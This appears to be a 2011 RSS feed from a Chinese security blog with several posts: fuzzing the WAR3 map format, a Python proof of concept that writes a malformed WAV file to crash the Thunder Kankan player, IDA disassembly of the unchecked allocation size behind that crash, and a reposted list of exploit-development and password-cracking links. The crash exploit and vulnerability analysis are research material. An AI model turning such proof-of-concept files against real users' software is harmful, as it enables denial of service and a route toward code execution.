<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>CQ-CSER &#187; IT</title>
	<atom:link href="http://cq-cser.cn/category/it/feed/" rel="self" type="application/rss+xml" />
	<link>http://cq-cser.cn</link>
	<description>计算机爱好者</description>
	<lastBuildDate>Sun, 15 Jan 2012 08:17:54 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>WAR3格式</title>
		<link>http://cq-cser.cn/2011/12/war3%e6%a0%bc%e5%bc%8f/</link>
		<comments>http://cq-cser.cn/2011/12/war3%e6%a0%bc%e5%bc%8f/#comments</comments>
		<pubDate>Mon, 12 Dec 2011 09:13:46 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1534</guid>
		<description><![CDATA[本来是考虑w3g格式的 参见如下 http://w3g.deepnode.de/files/w3g_format.txt 大致包含部分： 版本头 压缩数据 解压出来包含各类时间，动作等。用的是ZLIB解压 ///////////////////////////////////////////////////////////////////////////////////////////////////// 后来想了下，用录像不如用地图，随便打开一个 00000000h: 48 4D 33 57 00 00 00 00 E5 8F AA E6 98 AF E5 8F ; HM3W&#8230;.鍙槸鍙 00000010h: A6 E5 A4 96 E4 B8 80 E5 BC A0 E9 AD 94 E5 85 BD ; ﹀涓€寮犻瓟鍏? 00000020h: E4 BA 89 E9 9C B8 49 [...]


No related posts.]]></description>
			<content:encoded><![CDATA[<p>本来是考虑w3g格式的<br />
参见如下</p>
<p>http://w3g.deepnode.de/files/w3g_format.txt</p>
<p>大致包含部分：<br />
版本头<br />
压缩数据</p>
<p>解压出来包含各类时间，动作等。用的是ZLIB解压<br />
/////////////////////////////////////////////////////////////////////////////////////////////////////<br />
后来想了下，用录像不如用地图，随便打开一个</p>
<div id="_mcePaste">00000000h: 48 4D 33 57 00 00 00 00 E5 8F AA E6 98 AF E5 8F ; HM3W&#8230;.鍙槸鍙</div>
<div id="_mcePaste">00000010h: A6 E5 A4 96 E4 B8 80 E5 BC A0 E9 AD 94 E5 85 BD ; ﹀涓€寮犻瓟鍏?</div>
<div id="_mcePaste">00000020h: E4 BA 89 E9 9C B8 49 49 49 E7 9A 84 E5 9C B0 E5 ; 浜夐湼III鐨勫湴?</div>
<div id="_mcePaste">00000030h: 9B BE 00 14 9C 00 00 01 00 00 00 00 00 00 00 00 ; 浘..?&#8230;&#8230;&#8230;.</div>
<div id="_mcePaste">00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; &#8230;&#8230;&#8230;&#8230;&#8230;.</div>
<div>
<div>00000200h: 4D 50 51 1A 20 00 00 00 12 34 56 78 11 11 11 11 ; MPQ. &#8230;.4Vx&#8230;.</div>
<div>00000210h: A1 38 00 00 A1 3C 00 00 40 00 00 00 10 00 00 00 ; ?..?..@&#8230;&#8230;.</div>
<div>00000220h: 24 00 00 00 8D 02 00 00 BF 04 00 00 FE 06 00 00 ; $&#8230;?..?..?..</div>
<div>00000230h: 25 09 00 00 54 0B 00 00 85 0D 00 00 93 0F 00 00 ; %&#8230;T&#8230;?..?..</div>
</div>
<div>猜测下包含文件头和MPQ2部分，我们随便修改下MPQ后面的数字，如上，1234567811111111，用WAR3打开，果然CRASH了哈，一次是内存不够，一次是异常。大胆猜测，直接读取值开辟空间？</div>
<div><span id="more-1534"></span></div>
<div>WAR3应该是VC6的老编译器的吧。作为一个忠实真三DOTA爱好者，唉</div>
<div>////////////////////////////////////////////////////////////</div>
<div>再来看最近的几个scada的 ，不管是溢出还是use-after-free，某人的入手点很好啊，从注册类型PROJECT文件处理入手。</div>
<div>////////////////////////////////////////////////////////////</div>
<div>另，REALPLAYER一次补了好多洞啊</div>
<div>
<div>REALPLAYER  QCP,AAC,MP3,SWF，RealAudio sipr  漏洞</div>
<div>CVE-2011-2945</div>
<div>RealPlayer SIPR Heap Buffer Overflow Vulnerability   （out of bound）http://wiki.multimedia.cx/index.php?title=RealAudio_sipr</div>
<div>CVE-2011-2946</div>
<div>RealPlayer ActiveX Remote Code Execution Vulnerability</div>
<div>CVE-2011-2947</div>
<div>RealPlayer Cross-Zone Scripting Remote Code Execution Vulnerability</div>
<div>CVE-2011-2952</div>
<div>RealPlayer Dialog Box Use After Free Vulnerability</div>
<div>CVE-2011-2953</div>
<div>RealPlayer ActiveX Browser Plugin Out of Bounds Vulnerability.</div>
<div>CVE-2011-2954</div>
<div>RealPlayer Embedded AutoUpdate Use After Free Vulnerability</div>
<div>CVE-2011-2955</div>
<div>RealPlayer Embedded Modal Dialog Use After Free Vulnerability</div>
<div>CVE-2011-1221</div>
<div>RealPlayer Cross-Zone Scripting Remote Code Execution Vulnerability</div>
</div>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/12/war3%e6%a0%bc%e5%bc%8f/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>thunder_kankan_stack_overflow/dos exploit</title>
		<link>http://cq-cser.cn/2011/11/kankan-stackoverflowdos-exploit/</link>
		<comments>http://cq-cser.cn/2011/11/kankan-stackoverflowdos-exploit/#comments</comments>
		<pubDate>Thu, 17 Nov 2011 14:56:32 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1522</guid>
		<description><![CDATA[http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/kankan.py print &#8220;&#8221;" #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 #0      ___           ___           ___       ___       ___           ___     1 #1     /\__\         /\  \         /\__\     /\__\ [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2010/01/internet-explorer-aurora-exploit/' rel='bookmark' title='Permanent Link: Internet Explorer Aurora Exploit'>Internet Explorer Aurora Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/01/zzrising-antivirus-200820092010-local-privilege-escalation-exploit/' rel='bookmark' title='Permanent Link: [zz]Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit'>[zz]Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/09/%e5%85%b3%e4%ba%8eesp%e5%ae%9a%e5%be%8b/' rel='bookmark' title='Permanent Link: 关于esp定律'>关于esp定律</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div id="_mcePaste">
<div id="_mcePaste"><a href="http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/kankan.py">http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/kankan.py</a></div>
<div>print &#8220;&#8221;"</div>
<div id="_mcePaste">#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0</div>
<div id="_mcePaste">#0      ___           ___           ___       ___       ___           ___     1</div>
<div id="_mcePaste">#1     /\__\         /\  \         /\__\     /\__\     /\  \         /\__\    0</div>
<div id="_mcePaste">#0    /:/  /        /::\  \       /:/  /    /:/  /    /::\  \       /:/  /    1</div>
<div id="_mcePaste">#1   /:/__/        /:/\:\  \     /:/  /    /:/  /    /:/\:\  \     /:/__/     0</div>
<div id="_mcePaste">#0  /::\  \ ___   /::\~\:\  \   /:/  /    /:/  /    /:/  \:\  \   /::\__\____ 1</div>
<div id="_mcePaste">#1 /:/\:\  /\__\ /:/\:\ \:\__\ /:/__/    /:/__/    /:/__/ \:\__\ /:/\:::::\__\0</div>
<div id="_mcePaste">#0 \/__\:\/:/  / \:\~\:\ \/__/ \:\  \    \:\  \    \:\  \ /:/  / \/_|:|~~|~   1</div>
<div id="_mcePaste">#1      \::/  /   \:\ \:\__\    \:\  \    \:\  \    \:\  /:/  /     |:|  |    0</div>
<div id="_mcePaste">#0      /:/  /     \:\ \/__/     \:\  \    \:\  \    \:\/:/  /      |:|  |    1</div>
<div id="_mcePaste">#1     /:/  /       \:\__\        \:\__\    \:\__\    \::/  /       |:|  |    0</div>
<div id="_mcePaste">#0     \/__/         \/__/         \/__/     \/__/     \/__/         \|__|    1</div>
<div id="_mcePaste">#1                                                                            0</div>
<div id="_mcePaste">#0  [+] Exploit Title: Thunder kankan player Stack overflow/DOS Exploit       1</div>
<div id="_mcePaste">#1  [+] Software Link: dl.xunlei.com/xmp.html                                 0</div>
<div id="_mcePaste">#0  [+] Software:  Thunder kankan player                                      1</div>
<div id="_mcePaste">#1  [+] Version :   4.8.3.840(last)                                           0</div>
<div id="_mcePaste">#0  [+] Tested On:  WIN 7                                                     1</div>
<div id="_mcePaste">#1  [+] Code by:  hellok(warptencq@gmail.com)                                 0</div>
<div id="_mcePaste">#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-1</div>
<div id="_mcePaste">&#8220;&#8221;"</div>
<div id="_mcePaste">filepath = &#8220;exploit.wav&#8221;</div>
<div id="_mcePaste">f = open(filepath, &#8220;wb&#8221;)</div>
<div id="_mcePaste">file = &#8216;\x52\x49\x46\x46\x62\xb8\x20\x20\x57\x41\x56\x45\x66\x6d\x74\x20&#8242;</div>
<div id="_mcePaste">f.write(file)</div>
<div id="_mcePaste">f.close()</div>
<div id="_mcePaste">print &#8220;Done..&#8221;</div>
</div>
<p><span id="more-1522"></span><br />
主要2出错误，都是没校验直接从文件中读出。<br />
bass_wv.dll中的<br />
seg002:10005C2D ; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
seg002:10005C2D ; 148: clean_junk_part:<br />
seg002:10005C2D ; 149:         v17 = malloc(site_malloc_may_error);<br />
seg002:10005C2D<br />
seg002:10005C2D clean_junk_part:                        ; CODE XREF: seem_important+1BDj<br />
seg002:10005C2D                                         ; seem_important+245j<br />
seg002:10005C2D                 push    esi             ; Size<br />
seg002:10005C2E                 call    malloc          ;  /size = F2471B06 (-230221050.)可控<br />
seg002:10005C34 ; 150:         (**(memory1 + 112))(*(memory1 + 116), v17, site_malloc_may_error);// basedll(+116)<br />
seg002:10005C34                 mov     ecx, [ebp+74h]  ; 申请失败，导致EAX==00<br />
seg002:10005C37                 add     esp, 4<br />
seg002:10005C3A                 mov     edi, eax        ; eax==0000  污染源<br />
seg002:10005C3C                 mov     eax, [ebp+70h]<br />
seg002:10005C3F                 push    esi<br />
seg002:10005C40                 mov     edx, edi<br />
seg002:10005C42                 call    dword ptr [eax] ; call base.dll!!!!!!!!!!!!!!!!<br />
seg002:10005C42                                         ; 从文件里读ECX大小内容到刚开辟空间<br />
seg002:10005C44 ; 151:         free(v17);<br />
seg002:10005C44                 push    edi             ; Memory<br />
seg002:10005C45                 call    free<br />
seg002:10005C4B ; 152:         strncpy_ = strncmp;<br />
seg002:10005C4B                 mov     edi, strncmp<br />
seg002:10005C51                 add     esp, 4<br />
seg002:10005C54                 jmp     loc_10005AF7</p>
<p>另一来自base.dll<br />
seg000:1001083D                 pop     eax<br />
seg000:1001083E ; 100:       if ( v66 &gt; 0&#215;12 )  v66可控污染源<br />
seg000:1001083E                 cmp     [ebp+var_10], eax<br />
seg000:10010841                 jbe     short crash_inside<br />
seg000:10010843 ; 101:         v14 = v66;<br />
seg000:10010843                 mov     eax, [ebp+var_10]<br />
seg000:10010846 ; 102:       v15 = v14 + 3;<br />
seg000:10010846<br />
seg000:10010846 crash_inside:                           ; CODE XREF: crash_here__+242j<br />
seg000:10010846                 add     eax, 3<br />
seg000:10010849 ; 103:       LOBYTE(v15) = v15 &amp; 0xFC;<br />
seg000:10010849                 and     al, 0FCh<br />
seg000:1001084B ; 104:       v16 = alloca(v15);<br />
seg000:1001084B                 call    __alloca_probe<br />
seg000:10010850 ; 105:       v4 = &amp;v39;<br />
seg000:10010850                 mov     ebx, esp<br />
seg000:10010852 ; 106:       sub_10001974(v5, &amp;v39, v66);</p>
<p>bass_wv.dll的里面看了半天,想搞个什么use after free,double free什么的,可惜没找到啊,小遗憾啦</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2010/01/internet-explorer-aurora-exploit/' rel='bookmark' title='Permanent Link: Internet Explorer Aurora Exploit'>Internet Explorer Aurora Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/01/zzrising-antivirus-200820092010-local-privilege-escalation-exploit/' rel='bookmark' title='Permanent Link: [zz]Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit'>[zz]Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/09/%e5%85%b3%e4%ba%8eesp%e5%ae%9a%e5%be%8b/' rel='bookmark' title='Permanent Link: 关于esp定律'>关于esp定律</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/11/kankan-stackoverflowdos-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Blogs, Feeds, Guides &amp; Links[zz]</title>
		<link>http://cq-cser.cn/2011/11/blogs-feeds-guides-linkszz/</link>
		<comments>http://cq-cser.cn/2011/11/blogs-feeds-guides-linkszz/#comments</comments>
		<pubDate>Sun, 13 Nov 2011 10:33:15 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1520</guid>
		<description><![CDATA[原文：http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html 顺便FK GFW 特别推荐http://j00ru.vexillium.org/?p=893此系列 Programming/Coding [Bash] Advanced Bash-Scripting Guide &#8211; http://tldp.org/LDP/abs/html/ [Bash] Bash shell scripting tutorial &#8211; http://steve-parker.org/sh/sh.shtml [Bash] Bourne Shell Reference &#8211; http://linuxreviews.org/beginner/bash_GNU_Bourne-Again_SHell_Reference/ [CheatSheet] Scripting Languages: PHP, Perl, Python, Ruby &#8211; http://hyperpolyglot.org/scripting Offensive Security&#8217;s Pentesting With BackTrack (PWB) Course [Pre-course] Corelan Team &#8211; http://www.corelan.be [Pre-course] The Penetration Testing Execution Standard &#8211; http://www.pentest-standard.org/index.php/Main_Page [Hash] NTLM [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2011/10/recent-life/' rel='bookmark' title='Permanent Link: recent life'>recent life</a></li>
<li><a href='http://cq-cser.cn/2010/01/internet-explorer-aurora-exploit/' rel='bookmark' title='Permanent Link: Internet Explorer Aurora Exploit'>Internet Explorer Aurora Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/01/top-ten-web-hacking-techniques-of-2009/' rel='bookmark' title='Permanent Link: Top Ten Web Hacking Techniques of 2009!'>Top Ten Web Hacking Techniques of 2009!</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>原文：http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html<br />
顺便FK GFW<br />
特别推荐http://j00ru.vexillium.org/?p=893此系列<span id="more-1520"></span></p>
<p>Programming/Coding<br />
[Bash] Advanced Bash-Scripting Guide &#8211; http://tldp.org/LDP/abs/html/<br />
[Bash] Bash shell scripting tutorial &#8211; http://steve-parker.org/sh/sh.shtml<br />
[Bash] Bourne Shell Reference &#8211; http://linuxreviews.org/beginner/bash_GNU_Bourne-Again_SHell_Reference/<br />
[CheatSheet] Scripting Languages: PHP, Perl, Python, Ruby &#8211; http://hyperpolyglot.org/scripting</p>
<p>Offensive Security&#8217;s Pentesting With BackTrack (PWB) Course<br />
[Pre-course] Corelan Team &#8211; http://www.corelan.be<br />
[Pre-course] The Penetration Testing Execution Standard &#8211; http://www.pentest-standard.org/index.php/Main_Page<br />
[Hash] NTLM Decrypter &#8211; http://www.md5decrypter.co.uk/ntlm-decrypt.aspx<br />
[Hash] reverse hash search and calculator &#8211; http://goog.li</p>
<p>http://security.crudtastic.com/?p=213</p>
<p>Tunnelling / Pivoting<br />
[Linux] SSH gymnastics with proxychains &#8211; http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html<br />
[Windows] Nessus Through SOCKS Through Meterpreter &#8211; http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php</p>
<p>WarGames / Online Challenges<br />
[WarGames] Title &#8211; http://securityoverride.com<br />
[WarGames] Title &#8211; http://intruded.net<br />
[Challenge] The Ksplice Pointer Challenge &#8211; http://blogs.oracle.com/ksplice/<br />
[WarGames] Title &#8211; http://spotthevuln.com<br />
[WarGames] Title &#8211; http://cvo-lab.blogspot.com/2011/05/iawacs-2011-forensics-challenge.html<br />
[WarGames] Title &#8211; http://ftp.hackerdom.ru/ctf-images/</p>
<p>Exploit Development (Programs)<br />
[Download] Title &#8211; http://www.oldapps.com/<br />
[Download] Title &#8211; http://www.oldversion.com/<br />
[Download] Title &#8211; http://www.exploit-db.com/webapps/</p>
<p>Misc<br />
[RSS] Open Penetration Testing Bookmarks Collection &#8211; https://code.google.com/p/pentest-bookmarks/downloads/list<br />
[ExploitDev] Data mining Backtrack 4 for buffer overflow return addresses  &#8211; http://insidetrust.blogspot.com/2010/12/data-mining-backtrack-4-for-buffer.html<br />
[DIY] Repair a Broken Ethernet Plug &#8211; http://www.instructables.com/id/Repair-a-Broken-Ethernet-Plug/step5/Make-its-Head-Thin/<br />
[Desktop] Ubuntu Security &#8211; http://ubuntuforums.org/showthread.php?t=510812<br />
[TechHumor] Title &#8211; https://www.xkcd.com<br />
[TechHumor] Title &#8211; http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf </p>
<p>Exploit Development<br />
[Guides] Corelan Team &#8211; http://www.corelan.be<br />
[Guide] From 0&#215;90 to 0x4c454554, a journey into exploitation.  &#8211; http://myne-us.blogspot.com/2010/08/from-0&#215;90-to-0x4c454554-journey-into.html<br />
[Guide] An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities &#8211; http://resources.infosecinstitute.com/intro-to-fuzzing/<br />
[Video] TiGa&#8217;s Video Tutorial Series on IDA Pro &#8211; http://www.woodmann.com/TiGa/idaseries.html<br />
[Guide] Advanced Windows Buffer Overflows &#8211; http://labs.snort.org/awbo/<br />
[Guide] Stack Based Windows Buffer Overflow Tutorial &#8211; http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.htmlt<br />
[Guide] SEH Stack Based Windows Buffer Overflow Tutorial &#8211; http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html<br />
[Guide] Windows Buffer Overflow Tutorial: Dealing with Character Translation &#8211; http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html<br />
[Guide] Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability< &#8211; http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html<br />
[Guide] Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump &#8211; http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html<br />
[Linux] Linux exploit development part 1 – Stack overflow. &#8211; http://sickness.tor.hu/?p=363<br />
[Linux] Linux Exploit Writing Tutorial Pt 2 – Stack Overflow ASLR bypass Using ret2reg &#8211; http://sickness.tor.hu/?p=365<br />
[Linux] Linux exploit development part 3 – ret2libc &#8211; http://sickness.tor.hu/?p=368<br />
[Linux] Linux exploit development part 4 – ASCII armor bypass + return-to-plt &#8211; http://sickness.tor.hu/?p=378<br />
[TechHumor] Title &#8211; https://www.youtube.com/watch?v=klXFqtYR5Mg<br />
[TechHumor] Title &#8211; http://amolnaik4.blogspot.com/2011/06/exploit-development-with-monapy.html</p>
<p>Exploit Development (Case Studies/Walkthroughs)<br />
[Web] Finding 0days in Web Applications &#8211; http://www.exploit-db.com/finding-0days-in-web-applications/<br />
[Windows] Offensive Security Exploit Weekend &#8211; http://www.corelan.be/index.php/2010/11/13/offensive-security-exploit-weekend/<br />
[Windows] From vulnerability to exploit under 5 min  &#8211; http://0entropy.blogspot.com/2011/02/from-vulnerability-to-exploit-under-5.html</p>
<p>Exploit Development (Patch Analysis)<br />
[Windows] A deeper look at ms11-058 &#8211; http://www.skullsecurity.org/blog/2011/a-deeper-look-at-ms11-058<br />
[Windows] Patch Analysis for MS11-058 &#8211; https://community.qualys.com/blogs/securitylabs/2011/08/23/patch-analysis-for-ms11-058<br />
[Windows] CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability &#8211; http://j00ru.vexillium.org/?p=893<br />
[Mobile] Analyzing and dissecting Android applications for security defects and vulnerabilities &#8211; https://www.net-security.org/article.php?id=1613</p>
<p>Exploit Development (Metasploit Wishlist)<br />
[ExplotDev] Metasploit Exploits Wishlist !  &#8211; http://esploit.blogspot.com/2011/03/metasploit-exploits-wishlist.html<br />
[Guide] Porting Exploits To Metasploit Part 1 &#8211; http://www.securitytube.net/video/2118</p>
<p>Passwords &#038; Rainbow Tables (WPA)<br />
[RSS] Title &#8211; http://ob-security.info/?p=475<br />
[RSS] Title &#8211; http://nakedsecurity.sophos.com/2011/06/14/the-top-10-passcodes-you-should-never-use-on-your-iphone/<br />
[RSS] Title &#8211; http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html<br />
[WPA] Offensive Security: WPA Rainbow Tables &#8211; http://www.offensive-security.com/wpa-tables/<br />
[Tool] Ultra High Security Password Generator &#8211; https://www.grc.com/passwords.htm<br />
[Guide] Creating effective dictionaries for password attacks  &#8211; http://insidetrust.blogspot.com/2010/07/creating-effective-dictionaries-for.html<br />
[Leaked] Diccionarios con Passwords de Sitios Expuestos &#8211; http://www.dragonjar.org/diccionarios-con-passwords-de-sitios-expuestos.xhtml<br />
[Download] Index of / &#8211; http://svn.isdpodcast.com/wordlists/<br />
[Guide] Using Wikipedia as brute forcing dictionary &#8211; http://lab.lonerunners.net/blog/using-wikipedia-as-brute-forcing-dictionary<br />
[Tool] CeWL &#8211; Custom Word List generator &#8211; http://www.digininja.org/projects/cewl.php<br />
[Download] Title &#8211; http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists<br />
[Leaked] Passwords &#8211; http://www.skullsecurity.org/wiki/index.php/Passwords</p>
<p>Cheat-Sheets<br />
[OS] A Sysadmin&#8217;s Unixersal Translator  &#8211; http://bhami.com/rosetta.html<br />
[WiFi] WirelessDefence.org&#8217;s Wireless Penetration Testing Framework &#8211; http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html</p>
<p>Anti-Virus<br />
[Metasploit] Facts and myths about antivirus evasion with Metasploit &#8211; http://schierlm.users.sourceforge.net/avevasion.html<br />
[Terms] Methods of bypassing Anti-Virus (AV) Detection &#8211; NetCat &#8211; http://compsec.org/security/index.php/anti-virus/283-anti-virus-central-methods-of-bypassing-anti-virus-av-detection.html</p>
<p>Privilege Escalation<br />
[Linux] Hacking Linux Part I: Privilege Escalation &#8211; http://www.dankalia.com/tutor/01005/0100501004.htm<br />
[Windows] Windows 7 UAC whitelist &#8211; http://www.pretentiousname.com/misc/win7_uac_whitelist2.html<br />
[Windows] Windows Privilege Escalation Part 1: Local Administrator Privileges &#8211; http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-1-local-administrator-privileges/ </p>
<p>Metasploit<br />
[Guide] fxsst.dll persistence: the evil fax machine &#8211; http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-evil-fax-machine.html<br />
[Guide] Bypassing DEP/ASLR in browser exploits with McAfee and Symantec &#8211; http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/<br />
[Guides] Metasploit Unleashed &#8211; http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training<br />
[Guides] Metasploit Megaprimer (Exploitation Basics And Need For Metasploit) Part 1 &#8211; http://www.securitytube.net/video/1175</p>
<p>Default Generators<br />
[WEP] mac2wepkey &#8211; Huawei default WEP generator &#8211; http://websec.ca/blog/view/mac2wepkey_huawei<br />
[WEP] Generator: Attacking SKY default router password &#8211; http://sec.jetlib.com/BackTrack_Linux_Forums/2011/01/12/Generator:_Attacking_SKY_default_router_password</p>
<p>Statistics<br />
[Defacements] Zone-H &#8211; http://www.zone-h.org<br />
[ExploitKits] CVE Exploit Kit list &#8211; http://exploitkit.ex.ohost.de/CVE%20Exploit%20Kit%20List.htm</p>
<p>Cross Site Scripting (XSS)<br />
[Guide] vbSEO – From XSS to Reverse PHP Shell &#8211; http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/<br />
[RSS] Title &#8211; http://www.thespanner.co.uk/2009/03/25/xss-rays/ </p>
<p>Podcasts<br />
[Weekly] PaulDotCom &#8211; http://pauldotcom.com/podcast/psw.xml<br />
[Monthly] Social-Engineer &#8211; http://socialengineer.podbean.com/feed/</p>
<p>Blogs &#038; RSS<br />
[RSS] SecManiac &#8211; http://www.secmaniac.com<br />
[Guides] Carnal0wnage &#038; Attack Research &#8211; http://carnal0wnage.attackresearch.com<br />
[RSS] Contagio &#8211; http://contagiodump.blogspot.com<br />
[News] THN : The Hacker News &#8211; http://thehackernews.com<br />
[News] Packet Storm: Full Disclosure Information Security &#8211; http://packetstormsecurity.org<br />
[Guides] pentestmonkey | Taking the monkey work out of pentesting &#8211; http://pentestmonkey.net<br />
[RSS] Darknet &#8211; The Darkside | Ethical Hacking, Penetration Testing &#038; Computer Security &#8211; http://www.darknet.org.uk<br />
[RSS] Irongeek &#8211; http://www.irongeek.com<br />
[Metasploit] Room 363 &#8211; http://www.room362.com<br />
[Guides] Question Defense: Technology Answers For Technology Questions &#8211; http://www.question-defense.com/<br />
[Guides] stratmofo&#8217;s blog  &#8211; http://securityjuggernaut.blogspot.com<br />
[Guides] TheInterW3bs &#8211; http://theinterw3bs.com</p>
<p>[Guides] consolecowboys &#8211; http://console-cowboys.blogspot.com<br />
[Guides] A day with Tape &#8211; http://adaywithtape.blogspot.com<br />
[Guides] Cybexin&#8217;s Blog &#8211; Network Security Blog &#8211; http://cybexin.blogspot.com</p>
<p>[RSS] BackTrack Linux &#8211; Penetration Testing Distribution &#8211; http://www.backtrack-linux.org/feed/<br />
[RSS] Offensive Security &#8211; http://www.offensive-security.com/blog/feed/</p>
<p>[RSS] Title &#8211; http://www.pentestit.com<br />
[RSS] Title &#8211; http://michael-coates.blogspot.com<br />
[RSS] Title &#8211; http://blog.0x0e.org<br />
[RSS] Title &#8211; http://0&#215;80.org/blog<br />
[RSS] Title &#8211; http://archangelamael.shell.tor.hu<br />
[RSS] Title &#8211; http://archangelamael.blogspot.com<br />
[RSS] Title &#8211; http://www.coresec.org<br />
[RSS] Title &#8211; http://noobys-journey.blogspot.com<br />
[RSS] Title &#8211; http://www.get-root.com<br />
[RSS] Title &#8211; http://www.kislaybhardwaj.com<br />
[RSS] Title &#8211; https://community.rapid7.com/community/metasploit/blog<br />
[RSS] Title &#8211; http://mimetus.blogspot.com<br />
[RSS] Title &#8211; http://hashcrack.blogspot.com<br />
[RSS] Title &#8211; https://rephraseit.wordpress.com<br />
[RSS] Title &#8211; http://www.exploit-db.com<br />
[RSS] Title &#8211; http:/skidspot.blogspot.com<br />
[RSS] Title &#8211; http://grey-corner.blogspot.com<br />
[RSS] Title &#8211; http://vishnuvalentino.com<br />
[RSS] Title &#8211; http://ob-security.info</p>
<p>&#8230;. Not enough? Try twitter and/or IRC!</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2011/10/recent-life/' rel='bookmark' title='Permanent Link: recent life'>recent life</a></li>
<li><a href='http://cq-cser.cn/2010/01/internet-explorer-aurora-exploit/' rel='bookmark' title='Permanent Link: Internet Explorer Aurora Exploit'>Internet Explorer Aurora Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/01/top-ten-web-hacking-techniques-of-2009/' rel='bookmark' title='Permanent Link: Top Ten Web Hacking Techniques of 2009!'>Top Ten Web Hacking Techniques of 2009!</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/11/blogs-feeds-guides-linkszz/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>记事</title>
		<link>http://cq-cser.cn/2011/11/what_ever/</link>
		<comments>http://cq-cser.cn/2011/11/what_ever/#comments</comments>
		<pubDate>Wed, 02 Nov 2011 06:23:21 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1515</guid>
		<description><![CDATA[http://mpc-hc.svn.sourceforge.net/viewvc/mpc-hc/trunk/src/filters/transform/MPCVideoDec/MPCVideoDecFilter.cpp?view=log // We crash inside this function // In swscale.c: Function &#8216;simpleCopy&#8217; // Line: 1961 &#8211; Buffer Overrun // This might be ffmpeg fault or more likely mpchc is not reinitializing ffmpeg correctly during display change (moving mpchc window from display A to display B) 搞了好久才无意发现是这个。暂时不好利用。待定了。 枉费我在没SYMBOLS的情况下搞了好久，心碎啊，教训教训。。 While this DLL seems interesting, it does not [...]


